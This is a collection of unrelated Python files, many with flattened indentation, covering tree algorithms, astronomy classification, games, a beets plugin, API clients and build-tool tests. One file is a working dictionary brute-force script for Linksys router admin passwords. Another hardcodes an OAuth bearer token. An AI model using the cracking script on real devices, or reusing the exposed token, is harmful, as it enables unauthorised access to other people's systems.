def distance(self, u, v):
return self.depth[u] + self.depth[v] - 2 * self.depth[self.get(u, v)]
    # Given the DFS post-order indices, returns how to merge the given vertices
    # pairwise in order of decreasing depth: [[merge source 1, merge source 2, merge destination], ...]
def unite(self, ar):
        # sort the query vertices by their DFS order index
v_l = [[self.back_dict[v - 1], v - 1] for v in ar]
v_l.sort(reverse = True)
bef = []
        aft = [v[1] for v in v_l] # reversed so we can pop from the end
res = []
while len(aft) > 1:
now = aft.pop()
            while bef and self.depth[self.get(bef[-1], now)] >= self.depth[self.get(now, aft[-1])]:
                res.append([bef[-1], now]) # record 1: the two merge sources
                now = self.get(bef.pop(), now) # merge now and bef[-1] into their LCA as a new point
                res[-1].append(now) # record 2: the merge destination
            # keep the current vertex pending for now
            bef.append(now)
        # merge the remaining vertices
now = aft[0]
while bef:
res.append([bef[-1], now])
            now = self.get(bef.pop(), now) # merge now and bef[-1] into their LCA as a new point
res[-1].append(now)
return res
# Usage example: ABC014 - Cycle (閉路)
n = getN()
G = [[] for _ in range(n)]
for x, y in [getNM() for i in range(n - 1)]:
G[x - 1] += [y - 1]
G[y - 1] += [x - 1]
lca = LCA(G)
q = getN()
ans = []
for a, b in [getNM() for i in range(q)]:
    # depth of a from the root + depth of b from the root - 2 * the shared part
    # lca.get(a - 1, b - 1): the LCA of a and b
ans += [lca.depth[a - 1] + lca.depth[b - 1] - 2 * lca.depth[lca.get(a - 1, b - 1)] + 1]
print(*ans, sep='\n')
# "Tenkei 90" problem 035 - Preserve Connectivity
N = getN()
E = [[] for i in range(N)]
for i in range(N - 1):
a, b = getNM()
E[a - 1].append(b - 1)
E[b - 1].append(a - 1)
Q = getN()
lca = LCA(E)
# record the DFS visit order from the root
lca.dfs(0, -1)
for _ in range(Q):
k, *v_l = getList()
cnt = 0
for a, b, _ in lca.unite(v_l):
cnt += lca.distance(a, b)
print(cnt)
|
# -*- coding: utf-8 -*-
def com(n):
    """Number of ways to choose 2 items out of n, i.e. n*(n-1)/2."""
    return float(n*(n-1)/2)
if __name__ == "__main__":
fid = open('main.txt','r')
#fout = open('out.txt','w')
k,m,n = [int(x) for x in fid.readline().split()]
print 1-(com(n)+com(m)/4+m*n/2)/com(k+m+n)
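# Note on the formula (this matches the Rosalind "Mendel's First Law" setup,
# assuming k homozygous dominant, m heterozygous and n homozygous recessive
# individuals): the chance that a random pair produces a recessive offspring is
# (C(n,2) + C(m,2)/4 + m*n/2) / C(k+m+n, 2), so the printed value, one minus
# that, is the probability of an offspring showing the dominant phenotype.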
|
from datetime import date
from . import db
class Company(db.Model):
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String(64), unique = True)
transaction_date = db.Column(db.DateTime)
per_share_deal_price = db.Column(db.Float)
executives = db.relationship('Executive', backref='company', lazy=True)
def __repr__(self):
return f'<Company: {self.name}>'
class Executive(db.Model):
id = db.Column(db.Integer, primary_key = True)
    company_id = db.Column(db.Integer, db.ForeignKey('company.id'))
name = db.Column(db.String(32))
title = db.Column(db.String(32))
start_date = db.Column(db.DateTime)
first_year_non_recurring_compensation = db.Column(db.Float, default = 0)
executive_compensation = db.relationship('Compensation', backref='executive', lazy=True)
non_equity_payments = db.relationship('NonEquityPayment', backref='executive', lazy=True)
options = db.relationship('Option', backref='executive', lazy=True)
restricted_stock = db.relationship('RestrictedStock', backref='executive', lazy=True)
def __repr__(self):
return f'<Executive: {self.name}, {self.title}, {self.company}, {self.start_date}, {self.first_year_non_recurring_compensation}>'
class Compensation(db.Model):
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
year = db.Column(db.Integer)
compensation = db.Column(db.Float)
class NonEquityPayment(db.Model):
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
amount = db.Column(db.Float)
description = db.Column(db.String(64))
reasonable_compensation_before_change = db.Column(db.Boolean, default = False)
reasonable_compensation_after_change = db.Column(db.Boolean, default = False)
class Option(db.Model):
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
number = db.Column(db.Float)
grant_date = db.Column(db.Date) # Need to add a grant id to distinguish between two grants on the same date
vesting_date = db.Column(db.Date)
strike_price = db.Column(db.Float)
change_of_control = db.Column(db.Boolean, default = False) # Set default = True if grant_date within 1 year of transaction_date, allow toggle for presumption to be rebutted
accelerated = db.Column(db.Boolean, default = True) # Need to allow for partial acceleration - next to vest, last to vest, pro rata, custom, acceleration to a date other than transaction date
roll_over = db.Column(db.Boolean, default = False)
class RestrictedStock(db.Model): # Same fixes as for options
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
number = db.Column(db.Float)
grant_date = db.Column(db.Date)
vesting_date = db.Column(db.Date)
change_of_control = db.Column(db.Boolean, default = False)
accelerated = db.Column(db.Boolean, default = True)
|
__author__ = 'Aravinth Panchadcharam'
__email__ = "me@aravinth.info"
__date__ = '22/04/15'
import cv2
if __name__ == '__main__':
img = cv2.imread('test.jpg', 0)
image_small = cv2.resize(img, (800, 600))
cv2.imshow('image', image_small)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
# classification backend
# Load libraries
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pickle # allows saving different trained models of the same classifier object
import time
import streamlit as st
@st.cache
def query_lightcurve_XD(SourceID):
"""
Download data for a single source from Xiao Dian's website. Source is identified using SourceID
"""
url = 'http://variables.cn:88/seldataz.php?SourceID=' + str(SourceID)
try:
lc_complete = pd.read_csv(url, header='infer')
lc = lc_complete.drop(columns = ['SourceID','flag'])
except:
lc_complete = pd.DataFrame()
lc = pd.DataFrame()
return lc, lc_complete
@st.cache
def query_lightcurve_DR(RA, Dec):
"""
Download data for a single source from DR2 dataset. Source is identified using RA and Dec location
"""
    circle_radius = 0.0028 # 1 arcsec = 0.00028 degrees
t_format = "ipac_table"
table_format = "FORMAT=" + str(t_format)
flag_mask = 32768
mask = "BAD_CATFLAGS_MASK=" + str(flag_mask)
collect="COLLECTION="+"ztf_dr2"
numobs = "NOBS_MIN=20"
# filter_band = "g"
label = []
SourceID =[]
start_time = time.time()
ra = RA
dec = Dec
circle = "POS=CIRCLE"+"+"+str(ra)+"+"+str(dec)+"+"+str(circle_radius)
# band = "BANDNAME="+ filter_band
params = circle + "&" + mask + "&" + numobs + "&" + collect + "&" + table_format
try:
url= "https://irsa.ipac.caltech.edu/cgi-bin/ZTF/nph_light_curves?" + params
lc_complete = pd.read_csv(url, header=None, delim_whitespace=True, skiprows=55) # extract data
header = pd.read_csv(url, header=None, sep='|', skiprows=50,usecols=range(1,25), nrows=1)
lc_complete.columns = header.iloc[0].str.strip()
lc = lc_complete[['ra','dec','hjd','mag','magerr','filtercode']]
lc.columns=['RAdeg', 'DEdeg', 'HJD', 'mag', 'e_mag', 'band']
lc.replace({'zg':'g'},inplace = True)
lc.replace({'zr':'r'},inplace = True)
val = lc.loc[:,'HJD']-2.4e6
lc.loc[:,'HJD'] = val
except:
lc_complete = pd.DataFrame()
lc = pd.DataFrame()
return lc, lc_complete
def plot_lc(lc):
"""
Function to plot the light curves
"""
data1 = lc[lc['band']=='r']
data2 = lc[lc['band']=='g']
fig, axs = plt.subplots(nrows=1, ncols=2, sharex=True)
ax = axs[0]
ax.errorbar(data2['HJD'],data2['mag'],yerr = data2['e_mag'],fmt='g.')
ax.invert_yaxis() # smaller magnitude means brighter stars, so invert the axis
ax.set_xlabel('time in HJD')
ax.set_ylabel('magnitude')
ax.set_title('Green Filter (g band)')
ax = axs[1]
ax.errorbar(data1['HJD'],data1['mag'],yerr = data1['e_mag'],fmt='r.')
ax.invert_yaxis() # smaller magnitude means brighter stars, so invert the axis
ax.set_xlabel ('time in HJD')
ax.set_ylabel('magnitude')
ax.set_title('Red Filter (r filter)')
fig.tight_layout(pad=3.0)
fig.suptitle('Measured Light Curve', fontsize=16)
st.pyplot(fig)
# def weighted_mean(mag,mag_err):
# mag2 = (mag_err*mag_err) # mag err square
# mag2_inv = 1/mag2.values; # take inverse of the values
# w = pd.Series(mag2_inv) # covert it back to s series
# sw = w.sum() # sum of weights
# wmag = mag*w # multiply magnitude with weights
# wmean = wmag.sum()/sw # weighted mean
# return wmean
def weighted_mean(mag,e_mag):
w = 1/(e_mag*e_mag)
sw = np.sum(w)
wmag = w*mag
wmean = np.sum(wmag)/sw
return wmean
# Welch-Stetson J, K variability statistics
def welsh_staton(mag_series,wmean):
N = len(mag_series)
d_i = N/(N-1)*(mag_series - wmean) # replace mean by weighted mean
d_i1 = d_i.shift(periods=-1)
d_i1.fillna(0, inplace = True)
Pi = d_i*d_i1
Pi_val = Pi.values
Psign = np.sign(Pi_val)
Jval = Psign*np.sqrt(np.abs(Pi_val))
J = np.sum(Jval)
K1 = abs(d_i.values)/N
K2 = np.sqrt(1/N*np.sum(d_i.values*d_i.values))
K = np.sum(K1*K2)
return J, K
def calculate_features(lc):
"""
Calculate features for a light curve passed as a dataframe.
"""
g_mean = []
g_wmean = [] # weighted mean
g_MAD = []
g_IQR = []
g_f60 = []
g_f70 = []
g_f80 = []
g_f90 = []
g_skew = []
g_kurtosis = []
g_welsh_K = []
g_welsh_J = []
r_mean = []
r_wmean = [] # weighted mean
r_MAD = []
r_IQR = []
r_f60 = []
r_f70 = []
r_f80 = []
r_f90 = []
r_skew = []
r_kurtosis = []
r_welsh_K = []
r_welsh_J = []
if len(lc) >1:
dfg = lc.loc[lc["band"] == "g"]
dfr = lc.loc[lc["band"] == "r"]
if len(dfg) > 1:
N = len(dfg)
wmean_temp = weighted_mean(dfg.mag.values,dfg.e_mag.values)
K_temp, J_temp = welsh_staton(dfg.mag, wmean_temp )
g_mean.append(dfg.mag.mean())
g_wmean.append(wmean_temp)
deviation = abs(dfg.mag - dfg.mag.median())
g_MAD.append(deviation.median())
g_IQR.append(dfg.mag.quantile(0.75) - dfg.mag.quantile(0.25))
g_f60.append(dfg.mag.quantile(0.80) - dfg.mag.quantile(0.2))
g_f70.append(dfg.mag.quantile(0.85) - dfg.mag.quantile(0.15))
g_f80.append(dfg.mag.quantile(0.9) - dfg.mag.quantile(0.10))
g_f90.append(dfg.mag.quantile(0.95) - dfg.mag.quantile(0.05))
g_skew.append(dfg.mag.skew())
g_kurtosis.append(dfg.mag.kurtosis())
g_welsh_J.append(J_temp)
g_welsh_K.append(K_temp)
else:
g_mean.append(np.NaN)
g_wmean.append(np.NaN)
g_MAD.append(np.NaN)
g_IQR.append(np.NaN)
g_f60.append(np.NaN)
g_f70.append(np.NaN)
g_f80.append(np.NaN)
g_f90.append(np.NaN)
g_skew.append(np.NaN)
g_kurtosis.append(np.NaN)
g_welsh_J.append(np.NaN)
g_welsh_K.append(np.NaN)
if len(dfr) >1:
N = len(dfr)
wmean_temp = weighted_mean(dfr.mag.values,dfr.e_mag.values)
K_temp, J_temp = welsh_staton(dfr.mag, wmean_temp )
r_mean.append(dfr.mag.mean())
r_wmean.append(wmean_temp)
deviation = abs(dfr.mag - dfr.mag.median())
r_MAD.append(deviation.median())
r_IQR.append(dfr.mag.quantile(0.75) - dfr.mag.quantile(0.25))
r_f60.append(dfr.mag.quantile(0.80) - dfr.mag.quantile(0.2))
r_f70.append(dfr.mag.quantile(0.85) - dfr.mag.quantile(0.15))
r_f80.append(dfr.mag.quantile(0.9) - dfr.mag.quantile(0.10))
r_f90.append(dfr.mag.quantile(0.95) - dfr.mag.quantile(0.05))
r_skew.append(dfr.mag.skew())
r_kurtosis.append(dfr.mag.kurtosis())
r_welsh_J.append(J_temp)
r_welsh_K.append(K_temp)
else:
r_mean.append(np.NaN)
r_wmean.append(np.NaN)
r_MAD.append(np.NaN)
r_IQR.append(np.NaN)
r_f60.append(np.NaN)
r_f70.append(np.NaN)
r_f80.append(np.NaN)
r_f90.append(np.NaN)
r_skew.append(np.NaN)
r_kurtosis.append(np.NaN)
r_welsh_J.append(np.NaN)
r_welsh_K.append(np.NaN)
else:
g_mean.append(np.NaN)
g_wmean.append(np.NaN)
g_MAD.append(np.NaN)
g_IQR.append(np.NaN)
g_f60.append(np.NaN)
g_f70.append(np.NaN)
g_f80.append(np.NaN)
g_f90.append(np.NaN)
g_skew.append(np.NaN)
g_kurtosis.append(np.NaN)
g_welsh_J.append(np.NaN)
g_welsh_K.append(np.NaN)
r_mean.append(np.NaN)
r_wmean.append(np.NaN)
r_MAD.append(np.NaN)
r_IQR.append(np.NaN)
r_f60.append(np.NaN)
r_f70.append(np.NaN)
r_f80.append(np.NaN)
r_f90.append(np.NaN)
r_skew.append(np.NaN)
r_kurtosis.append(np.NaN)
r_welsh_J.append(np.NaN)
r_welsh_K.append(np.NaN)
# del features
features = pd.DataFrame()
N = 1
# g filter data
features['g_mean'] = g_mean[0:N]
features['g_wmean'] = g_wmean[0:N]
features['g_MAD'] = g_MAD[0:N]
features['g_IQR'] = g_IQR[0:N]
features['g_f60'] = g_f60[0:N]
features['g_f70'] = g_f70[0:N]
features['g_f80'] = g_f80[0:N]
features['g_f90'] = g_f90[0:N]
features['g_skew'] = g_skew[0:N]
features['g_kurtosis'] = g_kurtosis[0:N]
features['g_welsh_J'] = g_welsh_J[0:N]
features['g_welsh_K'] = g_welsh_K[0:N]
# r filter data
features['r_mean'] = r_mean[0:N]
features['r_wmean'] = r_wmean[0:N]
features['r_MAD'] = r_MAD[0:N]
features['r_IQR'] = r_IQR[0:N]
features['r_f60'] = r_f60[0:N]
features['r_f70'] = r_f70[0:N]
features['r_f80'] = r_f80[0:N]
features['r_f90'] = r_f90[0:N]
features['r_skew'] = r_skew[0:N]
features['r_kurtosis'] = r_kurtosis[0:N]
features['r_welsh_J'] = r_welsh_J[0:N]
features['r_welsh_K'] = r_welsh_K[0:N]
return features
def prediction_probabilty(features):
"""
Predict probability for each of the 9 variable types using pre calculated features.
"""
prob={}
label = ['BYDra', 'EW', 'SR', 'RSCVN', 'RR', 'DSCT', 'EA', 'Mira', 'RRc']
prob_pd = pd.DataFrame(columns=['Probability'],index=label)
if np.isnan(features.iloc[0,:].values).all():
pass
else:
for variable_type in label:
print(variable_type)
name = 'XGBoost'
filename = '../pickles/'+ name+'_'+variable_type+'.pkl'
clf = pickle.load(open(filename, 'rb'))
predict_proba = clf.predict_proba(features)
prob[variable_type] = round(predict_proba[0,0],2)
# prob[variable_type] = clf.predict_proba(features)
prob_pd['Probability']=prob.values()
return prob_pd
@st.cache
def true_label(ID):
"""
Find true star type in the labeled data set
"""
## open label data table
widths = (8,7,4,13,43)
header_pd = pd.read_fwf('../databases/Labeled_data.txt', widths = widths,skiprows=7, nrows=27)
labeled_data = pd.read_csv('../databases/Labeled_data.txt', header=None, delim_whitespace=True, skiprows=36) # extract data
labeled_data.columns = header_pd.iloc[:,3]
true_label = labeled_data.loc[labeled_data['SourceID']==ID,'Type']
return true_label.values[0]
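# Sketch of how these helpers chain together in the app (assumed wiring, shown
# here only as a comment):
#   lc, _ = query_lightcurve_XD(SourceID)
#   plot_lc(lc)
#   features = calculate_features(lc)
#   probabilities = prediction_probabilty(features)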
|
import pygame
import math
WINDOW_WIDTH = 1280
WINDOW_HEIGHT = 736
class Player:
# Direction: 0 = right, 1 = down, 2 = left, 3 = up
def __init__(self):
self.image = pygame.image.load('./pics/player.png')
self.rect = self.image.get_rect()
self.rect.x = 0
self.rect.y = 0
self.length = 1
self.xPos = [0]
self.yPos = [0]
self.speed = 32
self.direction = 0
def moveLeft(self):
if self.direction != 0:
self.direction = 2
def moveUp(self):
if self.direction != 1:
self.direction = 3
def moveRight(self):
if self.direction != 2:
self.direction = 0
def moveDown(self):
if self.direction != 3:
self.direction = 1
def getPosition(self, type):
if type == "X":
returnValue = self.rect.x
else:
returnValue = self.rect.y
return returnValue
def update(self):
# Movement
if self.direction == 0:
self.rect.x += self.speed
elif self.direction == 1:
self.rect.y += self.speed
elif self.direction == 2:
self.rect.x -= self.speed
else:
self.rect.y -= self.speed
if self.rect.x > WINDOW_WIDTH-32:
self.rect.x = 0
if self.rect.x < 0:
self.rect.x = WINDOW_WIDTH
if self.rect.y > WINDOW_HEIGHT-32:
self.rect.y = 0
if self.rect.y < 0:
self.rect.y = WINDOW_HEIGHT
# Position Logic
if self.length >= 2:
for i in range(self.length-1, 0, -1):
self.xPos[i] = self.xPos[i-1]
self.yPos[i] = self.yPos[i-1]
self.xPos[0] = self.rect.x
self.yPos[0] = self.rect.y
def draw(self, surface):
# Draw Head
surface.blit(
self.image, self.rect)
for i in range(0, self.length-1):
surface.blit(self.image, (self.xPos[i], self.yPos[i]))
def updateLength(self):
self.xPos.append(self.xPos[self.length-1])
self.yPos.append(self.yPos[self.length-1])
self.length += 1
def isCollidingWithApple(self, apple):
isColliding = None
if self.rect.colliderect(apple):
isColliding = True
self.updateLength()
return isColliding
def isCollidingWithMyself(self):
isColliding = None
for i in range(1, self.length-1, 1):
if math.sqrt((self.xPos[i]-self.xPos[0])**2 + (self.yPos[i] - self.yPos[0])**2) < 32:
isColliding = True
return isColliding
|
# This file is part of beets.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Exports data from beets
"""
import sys
import codecs
import json
import csv
from xml.etree import ElementTree
from datetime import datetime, date
from beets.plugins import BeetsPlugin
from beets import ui
from beets import util
import mediafile
from beetsplug.info import library_data, tag_data
class ExportEncoder(json.JSONEncoder):
"""Deals with dates because JSON doesn't have a standard"""
def default(self, o):
if isinstance(o, (datetime, date)):
return o.isoformat()
return json.JSONEncoder.default(self, o)
class ExportPlugin(BeetsPlugin):
def __init__(self):
super().__init__()
self.config.add({
'default_format': 'json',
'json': {
# JSON module formatting options.
'formatting': {
'ensure_ascii': False,
'indent': 4,
'separators': (',', ': '),
'sort_keys': True
}
},
'jsonlines': {
# JSON Lines formatting options.
'formatting': {
'ensure_ascii': False,
'separators': (',', ': '),
'sort_keys': True
}
},
'csv': {
# CSV module formatting options.
'formatting': {
# The delimiter used to separate columns.
'delimiter': ',',
# The dialect to use when formatting the file output.
'dialect': 'excel'
}
},
'xml': {
# XML module formatting options.
'formatting': {}
}
# TODO: Use something like the edit plugin
# 'item_fields': []
})
def commands(self):
cmd = ui.Subcommand('export', help='export data from beets')
cmd.func = self.run
cmd.parser.add_option(
'-l', '--library', action='store_true',
help='show library fields instead of tags',
)
cmd.parser.add_option(
'-a', '--album', action='store_true',
help='show album fields instead of tracks (implies "--library")',
)
cmd.parser.add_option(
'--append', action='store_true', default=False,
help='if should append data to the file',
)
cmd.parser.add_option(
'-i', '--include-keys', default=[],
action='append', dest='included_keys',
help='comma separated list of keys to show',
)
cmd.parser.add_option(
'-o', '--output',
help='path for the output file. If not given, will print the data'
)
cmd.parser.add_option(
'-f', '--format', default='json',
help="the output format: json (default), jsonlines, csv, or xml"
)
return [cmd]
def run(self, lib, opts, args):
file_path = opts.output
file_mode = 'a' if opts.append else 'w'
file_format = opts.format or self.config['default_format'].get(str)
file_format_is_line_based = (file_format == 'jsonlines')
format_options = self.config[file_format]['formatting'].get(dict)
export_format = ExportFormat.factory(
file_type=file_format,
**{
'file_path': file_path,
'file_mode': file_mode
}
)
if opts.library or opts.album:
data_collector = library_data
else:
data_collector = tag_data
included_keys = []
for keys in opts.included_keys:
included_keys.extend(keys.split(','))
items = []
for data_emitter in data_collector(
lib, ui.decargs(args),
album=opts.album,
):
try:
data, item = data_emitter(included_keys or '*')
except (mediafile.UnreadableFileError, OSError) as ex:
self._log.error('cannot read file: {0}', ex)
continue
for key, value in data.items():
if isinstance(value, bytes):
data[key] = util.displayable_path(value)
if file_format_is_line_based:
export_format.export(data, **format_options)
else:
items += [data]
if not file_format_is_line_based:
export_format.export(items, **format_options)
class ExportFormat:
"""The output format type"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
self.path = file_path
self.mode = file_mode
self.encoding = encoding
# creates a file object to write/append or sets to stdout
self.out_stream = codecs.open(self.path, self.mode, self.encoding) \
if self.path else sys.stdout
@classmethod
def factory(cls, file_type, **kwargs):
if file_type in ["json", "jsonlines"]:
return JsonFormat(**kwargs)
elif file_type == "csv":
return CSVFormat(**kwargs)
elif file_type == "xml":
return XMLFormat(**kwargs)
else:
raise NotImplementedError()
def export(self, data, **kwargs):
raise NotImplementedError()
class JsonFormat(ExportFormat):
"""Saves in a json file"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
super().__init__(file_path, file_mode, encoding)
def export(self, data, **kwargs):
json.dump(data, self.out_stream, cls=ExportEncoder, **kwargs)
self.out_stream.write('\n')
class CSVFormat(ExportFormat):
"""Saves in a csv file"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
super().__init__(file_path, file_mode, encoding)
def export(self, data, **kwargs):
header = list(data[0].keys()) if data else []
writer = csv.DictWriter(self.out_stream, fieldnames=header, **kwargs)
writer.writeheader()
writer.writerows(data)
class XMLFormat(ExportFormat):
"""Saves in a xml file"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
super().__init__(file_path, file_mode, encoding)
def export(self, data, **kwargs):
# Creates the XML file structure.
library = ElementTree.Element('library')
tracks = ElementTree.SubElement(library, 'tracks')
if data and isinstance(data[0], dict):
for index, item in enumerate(data):
track = ElementTree.SubElement(tracks, 'track')
for key, value in item.items():
track_details = ElementTree.SubElement(track, key)
track_details.text = value
# Depending on the version of python the encoding needs to change
try:
data = ElementTree.tostring(library, encoding='unicode', **kwargs)
except LookupError:
data = ElementTree.tostring(library, encoding='utf-8', **kwargs)
self.out_stream.write(data)
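# Example invocation, based on the options defined in commands() above (a sketch
# assuming beets' usual "beet" command-line entry point):
#   beet export --format csv --output library.csv --include-keys title,artist,album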
|
# simple-crack.py - simple cracking method for linksys routers using JNAP library
# May 4th 2019
# info@tpidg.us
from jnap.router import Linksys
from time import sleep
import json
import sys
import getpass
addr = sys.argv[1]
dict = sys.argv[2]
router = Linksys(addr)
passwords = [line.rstrip('\n') for line in open(dict)]
count = 0
router.password(passwords[count])
checked_pass = router.check_password(passwords[count]).content
print str(count) + " " + str(passwords[count])
count += 1
while "Invalid" in checked_pass:
router.password(passwords[count])
checked_pass = router.check_password(passwords[count]).content
print str(count) + " " + str(passwords[count])
count += 1
print "Success!!" + str(passwords[count])
|
import unittest
import time
from utils import get_config
from utils import get_driver
class TestBase(unittest.TestCase):
def setUp(self):
self.config = get_config()
self.driver = get_driver()
time.sleep(0.5)
self.driver.maximize_window()
def tearDown(self):
self.driver.quit()
|
class Measures(object):
def __init__(self, measures_list=[]):
self.measures_list = measures_list[:]
def get_measures(self):
"""Return a list of Measure"""
#print dir(self.measures_list)
#print self.measures_list[0] is self.measures_list[3]
#raw_input('pigia2')
return self.measures_list
def add_measure(self, measure):
"""Adds a Measure"""
self.measures_list.append(measure)
|
from distutils.version import StrictVersion
VERSION = StrictVersion('0.3.5')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-07-26 14:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('features', '0009_auto_20190724_1025'),
]
operations = [
migrations.RemoveField(
model_name='feature',
name='tag',
),
migrations.AddField(
model_name='feature',
name='devComments',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='feature',
name='version',
field=models.CharField(blank=True, max_length=20, null=True),
),
]
|
import requests
#######
#This code works for getting a list of the courses
######
def sendRequest(url, headers):
r = requests.get(url, headers=headers)
return r
def getCourses(authToken):
headers = {}
headers["Authorization"] = authToken
r = sendRequest("https://classroom.googleapis.com/v1/courses", headers=headers)
return r.json()
def getAllCourseWork(authToken, courseID):
headers = {}
headers["Authorization"] = authToken
url = "https://classroom.googleapis.com/v1/courses/{0}/courseWork".format(authToken)
r = sendRequest(url, headers=headers)
return r.json()
authToken = "Bearer ya29.GlsIBJVWjjMiklgyfUWARL4fjXJmsr0OJd_HT0fkZBZIAaUVQZ6UdvWB3NX5Hf20fmeYQvxAr-ddw_GAsyLBpY7ktxIMDq6pQUYqL5R0JYkqf4kllw5n42tI4jrC"
print(getAllCourseWork(authToken, "284461542"))
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import hashlib
import os
import pkgutil
import shutil
import socket
import ssl
import tarfile
import time
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler
from io import BytesIO
from pathlib import Path
from typing import Callable, Dict, Iterable, Optional, Set, Union
import pytest
from pants.engine.console import Console
from pants.engine.fs import (
EMPTY_DIGEST,
EMPTY_SNAPSHOT,
AddPrefix,
CreateDigest,
Digest,
DigestContents,
DigestEntries,
DigestSubset,
Directory,
DownloadFile,
FileContent,
FileDigest,
FileEntry,
GlobMatchErrorBehavior,
MergeDigests,
PathGlobs,
PathGlobsAndRoot,
RemovePrefix,
Snapshot,
SnapshotDiff,
SymlinkEntry,
Workspace,
)
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import Get, goal_rule, rule
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.collections import assert_single_element
from pants.util.contextutil import http_server, temporary_dir
from pants.util.dirutil import relative_symlink, safe_file_dump
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
QueryRule(Digest, [CreateDigest]),
QueryRule(DigestContents, [PathGlobs]),
QueryRule(DigestEntries, [Digest]),
QueryRule(DigestEntries, [PathGlobs]),
QueryRule(Snapshot, [CreateDigest]),
QueryRule(Snapshot, [DigestSubset]),
QueryRule(Snapshot, [PathGlobs]),
],
isolated_local_store=True,
)
ROLAND_FILE_DIGEST = FileDigest(
"693d8db7b05e99c6b7a7c0616456039d89c555029026936248085193559a0b5d", 16
)
ROLAND_DIGEST = Digest("63949aa823baf765eff07b946050d76ec0033144c785a94d3ebd82baa931cd16", 80)
def prime_store_with_roland_digest(rule_runner: RuleRunner) -> None:
"""Prime lmdb_store with a directory of a file named 'roland' and contents 'European
Burmese'."""
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
snapshot = rule_runner.scheduler.capture_snapshots(
(PathGlobsAndRoot(PathGlobs(["*"]), temp_dir),)
)[0]
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DIGEST
# NB: Capturing a Snapshot avoids persisting directory entries to disk, so we have to ensure
# that independently.
rule_runner.scheduler.ensure_directory_digest_persisted(snapshot.digest)
def setup_fs_test_tar(rule_runner: RuleRunner) -> None:
"""Extract fs_test.tar into the rule_runner's build root.
Note that we use a tar, rather than rule_runner.write_files(), because it has symlinks set up a
certain way.
Contents:
4.txt
a
├── 3.txt
├── 4.txt.ln -> ../4.txt
└── b
├── 1.txt
└── 2
c.ln -> a/b
d.ln -> a
"""
data = pkgutil.get_data("pants.engine.internals", "fs_test_data/fs_test.tar")
assert data is not None
io = BytesIO()
io.write(data)
io.seek(0)
with tarfile.open(fileobj=io) as tf:
tf.extractall(rule_runner.build_root)
FS_TAR_ALL_FILES = (
"4.txt",
"a/3.txt",
"a/4.txt.ln",
"a/b/1.txt",
"a/b/2",
"c.ln/1.txt",
"c.ln/2",
"d.ln/3.txt",
"d.ln/4.txt.ln",
"d.ln/b/1.txt",
"d.ln/b/2",
)
FS_TAR_ALL_DIRS = ("a", "a/b", "c.ln", "d.ln", "d.ln/b")
def try_with_backoff(assertion_fn: Callable[[], bool], count: int = 4) -> bool:
for i in range(count):
time.sleep(0.1 * i)
if assertion_fn():
return True
return False
# -----------------------------------------------------------------------------------------------
# `PathGlobs`, including `GlobMatchErrorBehavior` and symlink handling
# -----------------------------------------------------------------------------------------------
def assert_path_globs(
rule_runner: RuleRunner,
globs: Iterable[str],
*,
expected_files: Iterable[str],
expected_dirs: Iterable[str],
) -> None:
snapshot = rule_runner.request(Snapshot, [PathGlobs(globs)])
assert snapshot.files == tuple(sorted(expected_files))
assert snapshot.dirs == tuple(sorted(expected_dirs))
if expected_files or expected_dirs:
assert snapshot.digest != EMPTY_DIGEST
else:
assert snapshot.digest == EMPTY_DIGEST
def test_path_globs_literal_files(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(rule_runner, ["4.txt"], expected_files=["4.txt"], expected_dirs=[])
assert_path_globs(
rule_runner,
["a/b/1.txt", "a/b/2"],
expected_files=["a/b/1.txt", "a/b/2"],
expected_dirs=["a", "a/b"],
)
assert_path_globs(rule_runner, ["c.ln/2"], expected_files=["c.ln/2"], expected_dirs=["c.ln"])
assert_path_globs(
rule_runner,
["d.ln/b/1.txt"],
expected_files=["d.ln/b/1.txt"],
expected_dirs=["d.ln", "d.ln/b"],
)
assert_path_globs(rule_runner, ["a/3.txt"], expected_files=["a/3.txt"], expected_dirs=["a"])
assert_path_globs(rule_runner, ["z.fake"], expected_files=[], expected_dirs=[])
def test_path_globs_literal_directories(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(rule_runner, ["c.ln"], expected_files=[], expected_dirs=["c.ln"])
assert_path_globs(rule_runner, ["a"], expected_files=[], expected_dirs=["a"])
assert_path_globs(rule_runner, ["a/b"], expected_files=[], expected_dirs=["a", "a/b"])
assert_path_globs(rule_runner, ["z"], expected_files=[], expected_dirs=[])
def test_path_globs_glob_pattern(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(rule_runner, ["*.txt"], expected_files=["4.txt"], expected_dirs=[])
assert_path_globs(
